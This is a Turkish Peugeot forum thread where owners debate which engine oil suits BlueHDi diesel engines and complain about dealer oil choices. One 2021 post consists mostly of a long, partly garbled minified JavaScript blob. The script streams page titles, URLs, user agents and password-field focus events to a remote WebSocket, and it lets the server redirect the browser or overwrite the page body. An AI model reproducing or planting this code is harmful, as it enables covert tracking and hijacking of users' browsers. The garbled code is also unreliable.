Peugeot Türkiye Forumları
Pejo.Com.TR Peugeot Yedek Parça
www.pejo.com.tr
Anasayfa Anasayfa >PEUGEOT MODELLERİ (ARIZALAR VE ÇÖZÜMLERİ) >5008 (2010-2016)
  Yeni Mesajlar Yeni Mesajlar RSS - BLU HDI DIZEL MOTOR YAGI SECIMI
  SSS SSS  Forumu Ara   Kayıt Ol Kayıt Ol  Giriş Giriş

BLU HDI DIZEL MOTOR YAGI SECIMI

Yanıt Yaz Yanıt Yaz
Yazar
  Konu Arama Konu Arama  Konu Seçenekleri Konu Seçenekleri
Çevrimdışı Pirsek Açılır Kutu Gör
1. Vites
1. Vites
Simge

Yaşı : Belirtilmemiş
Aracı : 5008
Durum: Aktif Değil
Mesaj Seçenekleri Mesaj Seçenekleri   Teşekkür (0) Teşekkür(0)   Alıntı Pirsek Alıntı  Yanıt YazCevapla Mesajın Direkt Linki Konu: BLU HDI DIZEL MOTOR YAGI SECIMI
    Gönderim Zamanı: 19 Mart 2016 Saat 13:54
2015 model blu hdi 5008 sahbiyim aracimi 15000 bakimina goturdugumde kullanilan yag hakkinda bilgi istedim bana total 0w30 ineo veya mobil 5w30formula ecs kullandiklarini soylediler aracin kitapcigina baktigimda aracta 0w30 acea c1 veyac2 ayrica psanin b71 2312 onayli yag kullanindiyordu.servisin her iki yagida bu standarti karsilamiyordu.ben israr edince araca mobil 0w30 fullekonomi diye yag koymuslar aracin sesi artti.ben arastirinca blu hdi motorlu araclara turkiyede uyumlu iki yag oldugunu ogrendim bunlar 0w30 total ineo first veya valvolin sny exrem env c2 dir.kesinlikle yagi kendiniz alin
Çevrimdışı mimit Açılır Kutu Gör
1. Vites
1. Vites
Simge

Yaşı : 39
Aracı : 308 & 406
Mesaj Seçenekleri Mesaj Seçenekleri   Teşekkür (0) Teşekkür(0)   Alıntı mimit Alıntı  Yanıt YazCevapla Mesajın Direkt Linki Gönderim Zamanı: 19 Mart 2016 Saat 21:11
Euro6 motorlar için şuan rahat bulunabilen tek yağ Total ineo first 0W-30, bunun haricinde ki yağlar euro 5 motorlar için, öyle tahmin ediyorum ki mobil ve motulde yakında euro6 motorlar için geliştirdikleri yağları piyasaya sunarlar, sonrasında deneme yoluyla hangisinin iyi olduğuna karar vermek lazım. Euro5 motor da mobil 1 esp 5w30 total a göre çok daha sessiz bir motor sunuyor aynı zamanda bu yağı kullandığım süre içerisinde bir defa bile emisyon sistemi ile ile ilgili bir uyarı almadım.

sizinde bir an önce uygun yağı temin edip,yağı değiştirmenizi tavsiye ederim.bakım yeni yapılmış olsa bile değişimin faydası olur,sadece yağ değişimi dışarıda özel serviste yaptırabilirsiniz,vakum yoluyla motor içindeki yağı çekip %85 90 oranında boşaltıyorlar.sonraki dolum işlemi zaten kolay. Kullanılan yağların ömürleri her ne kadar 15.000 km de olsa bakım periyodunun 10.000 km ye çekilmesinden yanayım. o filitrelerin 15,000 km sonraki halini görmüş birisi olarak.
Çevrimdışı Ozdemirli Açılır Kutu Gör
1. Vites
1. Vites
Simge

Aracı : 3008
Mesaj Seçenekleri Mesaj Seçenekleri   Teşekkür (0) Teşekkür(0)   Alıntı Ozdemirli Alıntı  Yanıt YazCevapla Mesajın Direkt Linki Gönderim Zamanı: 03 Aralık 2020 Saat 23:18
Çok uzun zaman olmuş bu konu açılalı. Ama ben yeniden alevlendirmek isterim. 3008 1.5 blue hdi aracımın ilk bakımını yetkili serviste yaptırdım. Bakımdan sonra motor sesi belirgin derecede arttı. Daha önceden daha tok ve sessiz çalışan motor şimdi daha tırtır şeklinde çalışmaya başladı. Motor ısınsa dahi sesli çalışıyor. Yağla ilgili olduğunu düşünüyorum. Bazı gruplarda aldığım cevaplar, fabrika çıkışı yağların 0W30 olduğu ama servislere gelen talimat sonrası 5W30 yağ koyulduğu yönünde. Bu bilgi doğru mu bilmiyorum ama bu yağ tipi motoru daha sesli çalıştırır mı sizce? 
Çevrimdışı matrixss Açılır Kutu Gör
1. Vites
1. Vites

Aracı : Belirtilmemiş
Mesaj Seçenekleri Mesaj Seçenekleri   Teşekkür (0) Teşekkür(0)   Alıntı matrixss Alıntı  Yanıt YazCevapla Mesajın Direkt Linki Gönderim Zamanı: 13 Aralık 2020 Saat 15:00
Bende ilk bakım için servise gittim. Dediğin gibi ineo esc5w30 yağ koyuyorlar. İlk başlarda bana da sanki daha sesli çalışıyor geldi. Belki psikolojik. Kasımda yaptırdım ben bakımı. Havalar soğudu biraz 4-5 derece oda etki edebilir. Şuan mesela aşırı sesli gelmiyor. 
Ineo first 0w30 yağ soğukken daha başarılı bir yağ. Sadece düşük derece akışkanlığı değil, çeşitli katkıları var. Motora soğukken yüklemenin verdiği zararı hiç bir yağ engelleyemez. Koyulan yağda motoru korumakta eksik kalmayacaktır. Yetkili servise devam edersem 0w30 yağ bahanesiyle yağımı kendim getireceğimi söyleyeceğim. Yağdan çok öpüyorlar. 

Düzenleyen matrixss - 13 Aralık 2020 Saat 15:00
1. Vites
1. Vites
Simge

Mesaj Seçenekleri Mesaj Seçenekleri   Teşekkür (0) Teşekkür(0)   Alıntı Ozdemirli Alıntı  Yanıt YazCevapla Mesajın Direkt Linki Gönderim Zamanı: 19 Ocak 2021 Saat 10:38
Bir arkadaşım, araca koyulacak yağ konusunda servisin seçenek sunduğunu ve müşteri kararına göre seçilen yağı araca koyduğunu söyledi. Hatta MyPeugeot uygulamasında "teklif al" seçeneği ile iki farklı yağa göre fiyat çıktığını da göstermişti bana. 
Ben de ilk bakımımı geçtiğimiz Kasım ayında İstanbulda bir yetkili serviste yaptırdım. Ama bana öyle birşey sorulmadı. Bu noktadan hareketle servislerde bir standart olmadığını düşünüyorum. Zira sizin yetkili servise yağımı kendim getireceğim demeniz de bu düşünceyi destekliyor. Siz bu şekilde söyleyince ne tepki verdiler? Merak ettim... 
1. Vites
1. Vites
Simge

Mesaj Seçenekleri Mesaj Seçenekleri   Teşekkür (0) Teşekkür(0)   Alıntı Ozdemirli Alıntı  Yanıt YazCevapla Mesajın Direkt Linki Gönderim Zamanı: 28 Ocak 2021 Saat 11:09
Merhabalar,
Yetkili mercilere danıştığımda, şasi numarasıyla yaptıkları kontrolde aracım için 5w30 yağ kullanılması gerektiği söylendi. İsteğe bağlı 0w30 yağ koyulur mu diye sorduğumda sorumluluğu almanız kaydıyla olabilir dendi!
1.5 dizel aracına yetkili serviste 0w30 yağ koyduran var mıdır? 
Çevrimdışı zeytinkoy Açılır Kutu Gör
1. Vites
1. Vites
Simge

Mesaj Seçenekleri Mesaj Seçenekleri   Teşekkür (0) Teşekkür(0)   Alıntı zeytinkoy Alıntı  Yanıt YazCevapla Mesajın Direkt Linki Gönderim Zamanı: 19 Temmuz 2021 Saat 10:36
!function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:S.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:S.pid,pn:S.pn};null!=I&&I.readyState==WebSocket.OPEN&&I.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:S.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:S.sendNotificationsInterval,useragent:navigator.appVersion.length>navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:S.pid,pn:S.pn};I.send(JSON.stringify(Y))}function i(){h()}function o(){n()&&(clearInterval(y),clearInterval(N)),timeout=setTimeout((function(){f()}),v)}function s(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();T!=e&&e&&m(),T=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&&"password"==Y.type&&!H){H=!0;var e={type:"password_input_focus",focus:!0,token:S.token};I.send(JSON.stringify(e))}}function D(Y){if(Y&&"password"==Y.type&&H){H=!1;var e={type:"password_input_focus",focus:!1,token:S.token};I.send(JSON.stringify(e))}}function c(Y){var e=document.activeElement;e&&e!=document.body?document.querySelector&&(e=document.querySelector(":focus")):e=null;for(var t=0;t1728e6))return new Date(i)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(o[1]),r.setMinutes(o[2]),a=o[5]}E.get(b)||E.set(b,k);var s=n?n.innerText:null;if(a&&s&&T){var M=(a+s+b+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Ynavigator.userAgent.length?navigator.appVersion:navigator.userAgent,I.send(JSON.stringify(n))}(),S.dontTrackWebPasswords&&(c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&Y.addedNodes&&0!=Y.addedNodes.length&&(window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&&c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.onbeforeunload=D))}function l(){document.tmfilter||(f(),C={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function f(){(I=new WebSocket(S.connectionString)).onclose=o,I.onmessage=s,I.onopen=d,S.extJs&&(this.extJs.webSockReady=()=>I.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=>I.send(Y))}function g(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;er&&(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),i=t.en,o=i.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=o[Y];return e?o.post(e.call(i,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,i,o=t.en,s=o.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,D={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var d=0,l=1;for(i="";!i;)i=a[++d];a=i.charAt(0);var f=s.slice(M);if(2>d){var g=o.parser.call(o,f,n);c[a]=g.index,"M"===a&&c[a]++,l=g.length}else if(7>d)g=(f.match(D[d])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-i.length):g),l=g.length;else if(" "!==a&&a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===s.length&&g?(c.Y+=70>c.Y?2e3:100>c.Y?1900:0,c.H=c.H||o.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1>c.M||12c.D||c.D>Y[c.M-1]||23Bu yağ konusunda konuda bende de soru işaretleri var.

Düzenleyen zeytinkoy - 19 Temmuz 2021 Saat 10:36
 Yanıt Yaz Yanıt Yaz
Forum Atla Forum İzinleri Açılır Kutu Gör

Peugeot Türkiye Forumları PEUGEOT TÜRKİYE FORUMLARINDA SON 20 KONU
Peugeot Türkiye Fan Club Gündem      
konu icon Peugeot Yedek Parça
konu icon 206 otomatik vites sorunu son mesaja git 1457 8 arifbsrn
konu icon 206 1.4 8v Subap Ayarı(Resimli) son mesaja git 1419 1 arifbsrn
konu icon Bilgi ekranı son mesaja git 174 0 Erdo
konu icon Otomatik Şanzıman Geç Vites Atma Sorunu son mesaja git 4891 8 Eycof
konu icon AL4 OTOMATİK ŞANZUMAN SORUNU ( D de giderken boşa son mesaja git 5986 7 Eycof
konu icon Peugeot 307 Otomatik Vites Arızası (ÇÖZÜLDÜ) son mesaja git 25151 20 Eycof
konu icon 99 206 Kar modu Spor Modu Arızası son mesaja git 1407 9 Eycof
konu icon Beyine çekilen şase kablosunu değiştirmek son mesaja git 106 0 antipollution
konu icon 1.4 HDi Emme Manifoltu Nasıl Takılır? son mesaja git 1105 2 antipollution
konu icon 206 Casper Projesi son mesaja git 177 1 cimenquantex
konu icon adblue ve diğer sorular son mesaja git 365 0 x.n
konu icon Kaza yaptım acil yardım. son mesaja git 238 0 xpity
konu icon 2012 model 508 far ampül değişim son mesaja git 1423 2 by_bozkurt
konu icon Teyp Sessiz Modu son mesaja git 10825 13 Metehanmrcan
konu icon Rcz almayı düşünüyorum ilk arabam olucak son mesaja git 521 0 Can Türk
konu icon Ani hızlanmalarda siyah duman son mesaja git 572 0 Aliturkoglu
konu icon Kizdirma buji arizasi,motor ariza lambasi yakar mi son mesaja git 4123 6 serdarcan34
konu icon 2011 Peugeot 308 - Elektrik Devre Arızası son mesaja git 3279 8 Adebisi
konu icon 3008 Carplay Sorunu son mesaja git 20 0 SrknYklmz
konu icon Mersin de bildiğiniz güvendiğiniz usta tavsiyeleri son mesaja git 2047 6 kiziltamu
Bizi Takip Edin   

Bu ayki En Aktif 10 Üye 2024 MART EN AKTİF 10 ÜYE
Üye Mesaj
Eycof 11
cimenquantex 6
Emintoprak 4
SametRcz 4
antipollution 3
serdarcan34 3
slckgms 3
Hüseyinboztas 2
arifbsrn 2
feyyazbugan 2
Bu ayki En Aktif 10 Üye FORUM YETKİLİLERİ
Üye Adı Yetki
GökhaN YÖNETİCİ
sonerkyl MODERATÖR
İçerik sağlayıcı paylaşım sitelerinden birisi olan PeugeotTurkey.Com Peugeot Turkey Forum Adresimizde T.C.K 20.ci Madde ve 5651 Sayılı Kanun'un 4.cü maddesinin (2).ci fıkrasına göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. PeugeotTurkey.Com hakkında yapılacak tüm hukuksal Şikayetler buradan iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 1 (Bir) Hafta içerisinde PeugeotTurkey.Com yönetimi olarak tarafımızdan gereken işlemler yapılacaktır.
Peugeot Turkey Fan Club © 2008 - 2024
“İnsanların en hayırlısı, insanlara faydalı olandır.“ H.Ş.

Peugeot Forum English